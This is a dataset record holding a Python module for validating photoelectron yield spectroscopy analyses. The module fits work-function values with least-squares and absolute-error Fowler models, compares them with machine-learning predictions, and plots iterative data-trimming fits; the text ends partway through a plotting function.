hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2a7384f2e4aad416a1b75b8c3ee8d3b58c1145b3
| 51,425
|
py
|
Python
|
pysfunclib/validation_func.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
pysfunclib/validation_func.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
pysfunclib/validation_func.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
import os
import time
from datetime import datetime
import pandas as pd
from pandas import Series, DataFrame
import scipy as sp
from scipy.optimize import leastsq
from scipy import stats
import numpy as np
import matplotlib.pyplot as plt
from pysfunclib import fowler_func as ff
from pysfunclib import fowler_func_opti as ffo
from pysfunclib import fit_prediction_lib as fpl
from pysfunclib import ml_prediction_lib as mp
from pysfunclib import rest_fit_prediction_lib as rfpl
"""
検証用のデータ解析用コード
Excelでまとめた検証データの解析用モジュール
"""
class DfFrame():
def __init__(self, df):
self.df = df
def df_column_set(self):
self.df["diff_fit"] = 0.01
self.df["diff_gb"] = 0.01
self.df["diff_rf"] = 0.01
self.df["diff_fit_abs"] = 0.01
self.df["predict_fit"] = 0.01
self.df["predict_gb"] = 0.01
self.df["predict_rf"] = 0.01
self.df["predict_fit_abs"] = 0.01
self.df["del_abs_fit"] = 0.01
self.df["del_lsq_fit"] = 0.01
self.df["del_abs_diff"] = 0.01
self.df["del_lsq_diff"] = 0.01
self.df["remove"] = 0.01
def df_return(self):
return self.df
def df_ml(self, path_name):
"""
path_name: regration parameter path
ex: './spys_reg_20200228_pure/'
"""
prd=mp.MLPredict(path_name=path_name)
prd.param_load()
start_time = time.time()
print("Start time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata_ =np.array(eval(self.df["ene"][i]))
ydata_ = np.array(eval(self.df["n_pys"][i]))
ml_values= prd.prediction(xdata_,ydata_)
self.df["predict_gb"][i]=ml_values['gb']
self.df["diff_gb"][i]=self.df["predict_gb"][i]-self.df['estimate_wf'][i]
self.df["predict_rf"][i]=ml_values['rf']
self.df["diff_rf"][i]=self.df["predict_rf"][i]-self.df['estimate_wf'][i]
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('sample nmae:',self.df["Sample_name"][i])
print('renge:',self.df["energy_range"][i])
print('wf:',self.df["estimate_wf"][i])
print('predict_GB:',self.df["predict_gb"][i])
print('difference_GB:',self.df["diff_gb"][i])
print('predict_RF:',self.df["predict_rf"][i])
print('difference_RF:',self.df["diff_rf"][i])
print()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_fitting(self, lossfunc='rmse'):
"""
all range fitting
lossfunc =
'mae' : absolute loss function
'rmse':least squrt loss function
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
#1行の行列に変換
xdata_ =np.array(eval(self.df["ene"][i]))
ydata_ = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
if lossfunc == 'mae':
fit_spys, fit_para, r2, ratio = ffo.abs_spys_fit(xdata_,ydata_,ini_para)
elif lossfunc == 'rmse' :
fit_spys, fit_para, r2, ratio = ffo.lsq_spys_fit(xdata_,ydata_,ini_para)
else :
pass
self.df.loc[i,["predict_fit"]] = fit_para[0]
self.df.loc[i,["diff_fit"]]=self.df["predict_fit"][i]-self.df['estimate_wf'][i]
r2_=r2
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('sample name:',self.df["Sample_name"][i])
print('renge:',self.df["energy_range"][i])
print('wf:',self.df["estimate_wf"][i])
print('predict_fit:',self.df["predict_fit"][i],type(self.df["predict_fit"][i]))
print('difference_fit:',self.df["diff_fit"][i])
print('r2:',r2_)
print()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_fitting2(self):
"""
all range fitting
lossfunc =
'mae' : absolute loss function
'rmse':least squrt loss function
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
#1行の行列に変換
xdata_ =np.array(eval(self.df["ene"][i]))
ydata_ = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
fit_spys_abs, fit_para_abs, r2_abs, ratio_abs = ffo.abs_spys_fit(xdata_,ydata_,ini_para)
fit_spys_lsq, fit_para_lsq, r2_lsq, ratio_lsq = ffo.lsq_spys_fit(xdata_,ydata_,ini_para)
# fitplot=fpl.FittingComparePlot(xdata=xdata_, ydata=ydata_,
# lsq_fit=fit_spys_lsq,
# lsq_para=fit_para_lsq,
# abs_fit=fit_spys_abs,
# abs_para=fit_para_abs,
# label=ini_para[0])
# fitplot.fit_plot()
if fit_para_lsq[0] > 7.0:
self.df.loc[i,["predict_fit"]] = 7.0
elif fit_para_lsq[0] <= 7.0:
self.df.loc[i,["predict_fit"]] = fit_para_lsq[0]
self.df.loc[i,["diff_fit"]]=self.df["predict_fit"][i]-self.df['estimate_wf'][i]
if fit_para_abs[0] > 7.0:
self.df.loc[i,["predict_fit_abs"]] = 7.0
elif fit_para_abs[0] <= 7.0:
self.df.loc[i,["predict_fit_abs"]] = fit_para_abs[0]
self.df.loc[i,["diff_fit_abs"]]=self.df["predict_fit_abs"][i]-self.df['estimate_wf'][i]
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('sample name:',self.df["Sample_name"][i])
print('renge:',self.df["energy_range"][i])
print('wf:',self.df["estimate_wf"][i])
print('lsq')
print('predict_fit:',self.df["predict_fit"][i],type(self.df["predict_fit"][i]))
print('difference_fit:',self.df["diff_fit"][i])
print('r2:',r2_lsq)
print('abs')
print('predict_fit:',self.df["predict_fit_abs"][i],type(self.df["predict_fit_abs"][i]))
print('difference_fit:',self.df["diff_fit_abs"][i])
print('r2:',r2_abs)
print()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_plot_raw(self):
"""
Fittingなし
データのみ
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
#1行の行列に変換
xdata_ =np.array(eval(self.df["ene"][i]))
ydata_ = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
fit_spys_abs, fit_para_abs, r2_abs, ratio_abs = ffo.abs_spys_fit(xdata_,ydata_,ini_para)
fit_spys_lsq, fit_para_lsq, r2_lsq, ratio_lsq = ffo.lsq_spys_fit(xdata_,ydata_,ini_para)
fitplot=fpl.FittingComparePlot(xdata=xdata_, ydata=ydata_,
lsq_fit=fit_spys_lsq,
lsq_para=fit_para_lsq,
abs_fit=fit_spys_abs,
abs_para=fit_para_abs,
label=ini_para[0])
fitplot.raw_plot()
if fit_para_lsq[0] > 7.0:
self.df.loc[i,["predict_fit"]] = 7.0
elif fit_para_lsq[0] <= 7.0:
self.df.loc[i,["predict_fit"]] = fit_para_lsq[0]
self.df.loc[i,["diff_fit"]]=self.df["predict_fit"][i]-self.df['estimate_wf'][i]
if fit_para_abs[0] > 7.0:
self.df.loc[i,["predict_fit_abs"]] = 7.0
elif fit_para_abs[0] <= 7.0:
self.df.loc[i,["predict_fit_abs"]] = fit_para_abs[0]
self.df.loc[i,["diff_fit_abs"]]=self.df["predict_fit_abs"][i]-self.df['estimate_wf'][i]
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('sample name:',self.df["Sample_name"][i])
print('renge:',self.df["energy_range"][i])
print('wf:',self.df["estimate_wf"][i])
print('lsq')
print('predict_fit:',self.df["predict_fit"][i],type(self.df["predict_fit"][i]))
print('difference_fit:',self.df["diff_fit"][i])
print('r2:',r2_lsq)
print('abs')
print('predict_fit:',self.df["predict_fit_abs"][i],type(self.df["predict_fit_abs"][i]))
print('difference_fit:',self.df["diff_fit_abs"][i])
print('r2:',r2_abs)
print()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_del_fitting_plot_rre(self):
"""
Loss function:mae mimimaize -> mae
Loss function:rmse mimimaize -> rmse
relative_ratio: rr= rmse/mae
Stop condition: rr < 1.41
Note: Not Good argolithm
問題点:最小化した回帰線それぞれからmae,rmseを導出してその比を取っている
(特許で一番最初のもの)
データ点が少なくモデルの誤差が多いときrrは不安定になる
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata = np.array(eval(self.df["ene"][i]))
ydata = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
self.start_remove = 0
self.iteration_step = 1
# Fitting
remove = self.start_remove
while True:
if remove == 0:
self.xdata_ = xdata[:]
self.ydata_ = ydata[:]
#All range fit_lsq
_, fit_para, _, _ = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
self.df.loc[i,["predict_fit"]] = fit_para[0]
else:
self.xdata_ = xdata[:(-1 * remove)]
self.ydata_ = ydata[:(-1 * remove)]
self.abs_fit_spys, self.abs_fit_para, abs_r2, abs_ratio = ffo.abs_spys_fit(self.xdata_, self.ydata_, ini_para)
self.lsq_fit_spys, self.lsq_fit_para, lsq_r2, lsq_ratio = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
print('---info------')
print('Sample name:',self.df["Sample_name"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('Remove point:', remove)
print('spys_lsq[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.lsq_fit_spys))
print('lsq_fit para', self.lsq_fit_para)
print()
print('spys_abs[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.abs_fit_spys))
print('abs_fit para', self.abs_fit_para)
print()
_,lsq_rmse,_,_ = ffo.evaluation(self.ydata_, self.lsq_fit_spys)
_,_,abs_mae,_ = ffo.evaluation(self.ydata_, self.abs_fit_spys)
relative_ratio=lsq_rmse/abs_mae
ratio2 = lsq_ratio/abs_ratio
print('lsq_rmse/abs_mae:{}'.format(relative_ratio))
print()
print('-----------------')
fitplot = fp.FittingComparePlot(self.xdata_, self.ydata_, self.lsq_fit_spys, self.lsq_fit_para, self.abs_fit_spys, self.abs_fit_para)
fitplot.fit_res_plot()
# 1.42
# if abs_ratio < 1.42 and lsq_ratio < 1.26 and relative_ratio < 1.26: and (abs_ratio < 1.5 or lsq_ratio<1.3)
# if 0.83 < ratio2 < 1.0 :
# if 0.886 < ratio2 < 1.128 :
# if 1.24 < relative_ratio < 1.42 :
if relative_ratio < 1.42 :
break
else:
remove = remove + self.iteration_step
self.df.loc[i,["del_abs_fit"]]=self.abs_fit_para[0]
self.df.loc[i,["del_lsq_fit"]]=self.lsq_fit_para[0]
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
print('############### Final results ############################')
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('Sample name:',self.df["Sample_name"][i])
print('Energy renge:',self.df["energy_range"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('---')
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print("remove:",remove)
print('lsq_rmse/abs_mae:{}'.format(relative_ratio))
print('---')
print()
print('R2_lsq:',lsq_r2)
print('lsq_ratio',lsq_ratio)
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print()
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print('#########################################################')
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_del_fitting_plot_re(self):
"""
Simple model
Loss function : MAE
Stop condition: Re=RMSE/MAE<1.41
Note:
分析範囲の削減が止まらない可能性がある。
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata = np.array(eval(self.df["ene"][i]))
ydata = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
self.start_remove = 0
self.iteration_step = 1
# Fitting
remove = self.start_remove
r2_val = 0
abs_fit_para_val = 0
lsq_fit_para_val = 0
while True:
if remove == 0:
self.xdata_ = xdata[:]
self.ydata_ = ydata[:]
#All range fit_lsq
_, fit_para, _, _ = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
self.df.loc[i,["predict_fit"]]= fit_para[0]
else:
self.xdata_ = xdata[:(-1 * remove)]
self.ydata_ = ydata[:(-1 * remove)]
self.abs_fit_spys, self.abs_fit_para, abs_r2, abs_ratio = ffo.abs_spys_fit(self.xdata_, self.ydata_, ini_para)
self.lsq_fit_spys, self.lsq_fit_para, lsq_r2, lsq_ratio = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
print('---info------')
print('sample name:',self.df["Sample_name"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('Remove point:', remove)
print('spys_lsq[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.lsq_fit_spys))
print('lsq_fit para', self.lsq_fit_para)
print()
print('spys_abs[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.abs_fit_spys))
print('abs_fit para', self.abs_fit_para)
print()
print('-----------------')
ratio = abs_ratio
fitplot = fp.FittingComparePlot(self.xdata_, self.ydata_, self.lsq_fit_spys, self.lsq_fit_para, self.abs_fit_spys, self.abs_fit_para)
fitplot.fit_res_plot()
if abs_r2 < 0:
print('R2 is negaive')
print('remove point: ',remove)
self.df.loc[i,["del_abs_fit"]]=7.0
self.df.loc[i,["del_lsq_fit"]]=7.0
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
break
elif ratio < 1.414:
print('stop! under 1.41')
print('remove point: ',remove)
self.df.loc[i,["del_abs_fit"]]=self.abs_fit_para[0]
self.df.loc[i,["del_lsq_fit"]]=self.lsq_fit_para[0]
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
break
else:
pass
remove = remove + self.iteration_step
print('############### Final results ############################')
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('Sample name:',self.df["Sample_name"][i])
print('Energy renge:',self.df["energy_range"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('---')
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print("remove:",remove)
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('---')
print()
print('R2_lsq:',lsq_r2)
print('lsq_ratio',lsq_ratio)
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print()
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print('#########################################################')
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_del_fitting_plot_rer2(self):
"""
Loss function : MAE
Stop condition: Re=RMSE/MAE<1.41 and R2(abs) improvement
Note:
比とR2の比較で削減範囲を止める
最新のアルゴリズム
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata = np.array(eval(self.df["ene"][i]))
ydata = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
self.start_remove = 0
self.iteration_step = 1
# Fitting
remove = self.start_remove
r2_val = 0
abs_fit_para_val = 0
lsq_fit_para_val = 0
while True:
if remove == 0:
self.xdata_ = xdata[:]
self.ydata_ = ydata[:]
#All range fit_lsq
_, fit_para, _, _ = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
self.df.loc[i,["predict_fit"]]= fit_para[0]
else:
self.xdata_ = xdata[:(-1 * remove)]
self.ydata_ = ydata[:(-1 * remove)]
self.abs_fit_spys, self.abs_fit_para, abs_r2, abs_ratio = ffo.abs_spys_fit(self.xdata_, self.ydata_, ini_para)
self.lsq_fit_spys, self.lsq_fit_para, lsq_r2, lsq_ratio = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
print('---info------')
print('sample name:',self.df["Sample_name"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('Remove point:', remove)
print('spys_lsq[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.lsq_fit_spys))
print('lsq_fit para', self.lsq_fit_para)
print()
print('spys_abs[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.abs_fit_spys))
print('abs_fit para', self.abs_fit_para)
print()
print('-----------------')
ratio = abs_ratio
fitplot = fp.FittingComparePlot(self.xdata_, self.ydata_, self.lsq_fit_spys, self.lsq_fit_para, self.abs_fit_spys, self.abs_fit_para)
fitplot.fit_res_plot()
if abs_r2 < 0:
print('R2 is negaive')
print('remove point: ',remove)
self.df.loc[i,["del_abs_fit"]]=7.0
self.df.loc[i,["del_lsq_fit"]]=7.0
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
break
elif ratio < 1.414:
print('stop! under 1.41')
print('remove point: ',remove)
self.df.loc[i,["del_abs_fit"]]=self.abs_fit_para[0]
self.df.loc[i,["del_lsq_fit"]]=self.lsq_fit_para[0]
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
break
elif r2_val > abs_r2 and ratio > 1.414 :
print('stop! over 1.41 and good R2 ')
print('remove point: ',remove-1)
self.df.loc[i,["del_abs_fit"]]=abs_fit_para_val
self.df.loc[i,["del_lsq_fit"]]=lsq_fit_para_val
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove-1
break
else:
pass
remove = remove + self.iteration_step
r2_val = abs_r2
abs_fit_para_val = self.abs_fit_para[0]
lsq_fit_para_val = self.lsq_fit_para[0]
print('############### Final results ############################')
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('Sample name:',self.df["Sample_name"][i])
print('Energy renge:',self.df["energy_range"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('---')
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print("remove:",remove)
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('---')
print()
print('R2_lsq:',lsq_r2)
print('lsq_ratio',lsq_ratio)
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print()
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print('#########################################################')
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_del_fitting_plot_r2(self):
"""
Loss function MAE
Stop condtion: R2 improvement
Note:
R2の値だけでR2の値が前の値よりも悪くなった時点でストップする。
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata = np.array(eval(self.df["ene"][i]))
ydata = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
self.start_remove = 0
self.iteration_step = 1
# Fitting
remove = self.start_remove
r2_val = 0
abs_fit_para_val = 0
lsq_fit_para_val = 0
while True:
if remove == 0:
self.xdata_ = xdata[:]
self.ydata_ = ydata[:]
#All range fit_lsq
_, fit_para, _, _ = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
self.df.loc[i,["predict_fit"]]= fit_para[0]
else:
self.xdata_ = xdata[:(-1 * remove)]
self.ydata_ = ydata[:(-1 * remove)]
self.abs_fit_spys, self.abs_fit_para, abs_r2, abs_ratio = ffo.abs_spys_fit(self.xdata_, self.ydata_, ini_para)
self.lsq_fit_spys, self.lsq_fit_para, lsq_r2, lsq_ratio = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
print('---info------')
print('sample name:',self.df["Sample_name"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('Remove point:', remove)
print('spys_lsq[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.lsq_fit_spys))
print('lsq_fit para', self.lsq_fit_para)
print()
print('spys_abs[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.abs_fit_spys))
print('abs_fit para', self.abs_fit_para)
print()
print('-----------------')
fitplot = fp.FittingComparePlot(self.xdata_, self.ydata_, self.lsq_fit_spys, self.lsq_fit_para, self.abs_fit_spys, self.abs_fit_para)
fitplot.fit_res_plot()
if r2_val > abs_r2 :
print('stop! good R2 ')
print('remove point: ',remove-1)
self.df.loc[i,["del_abs_fit"]]=abs_fit_para_val
self.df.loc[i,["del_lsq_fit"]]=lsq_fit_para_val
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove-1
break
remove = remove + self.iteration_step
r2_val = abs_r2
abs_fit_para_val = self.abs_fit_para[0]
lsq_fit_para_val = self.lsq_fit_para[0]
print('############### Final results ############################')
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('Sample name:',self.df["Sample_name"][i])
print('Energy renge:',self.df["energy_range"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('---')
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print("remove:",remove-1)
print('R2_abs:',r2_val)
print('abs_ratio',abs_ratio)
print('---')
print()
print('R2_lsq:',lsq_r2)
print('lsq_ratio',lsq_ratio)
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print()
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print('#########################################################')
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def select_plot(df_name,comment='',gb=True, rf=True, fit=True, dabsfit=True, dlsqfit=True):
"""
Graph making
df_name is select df
"""
#default 12
plt.rcParams["font.size"] = 14
plt.tight_layout()
start_time = time.time()
print("Start time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print("comment: ",comment)
print("number of data: ",df_name['diff_gb'].count())
for ii in df_name.index:
# print('index:',ii)
# print()
fig, ax = plt.subplots(1,1,figsize=(6,4))
ax.plot(np.array(eval(df_name["ene"][ii])),np.array(eval(df_name["n_pys"][ii])),'-o',label='Data')
ax.set_xlabel('Energy [eV]')
ax.set_ylabel('PYS$^{1/2}$ [a.u.]')
max_value_y=max(np.array(eval(df_name["n_pys"][ii])))
min_value_y=min(np.array(eval(df_name["n_pys"][ii])))
max_value_x=max(np.array(eval(df_name["ene"][ii])))
min_value_x=min(np.array(eval(df_name["ene"][ii])))
ax.set_ylim(0,max_value_y)
ax.set_title('Sample: {}, Power: {} [nW]'.format(df_name["Sample_name"][ii],df_name["photon_power"][ii]))
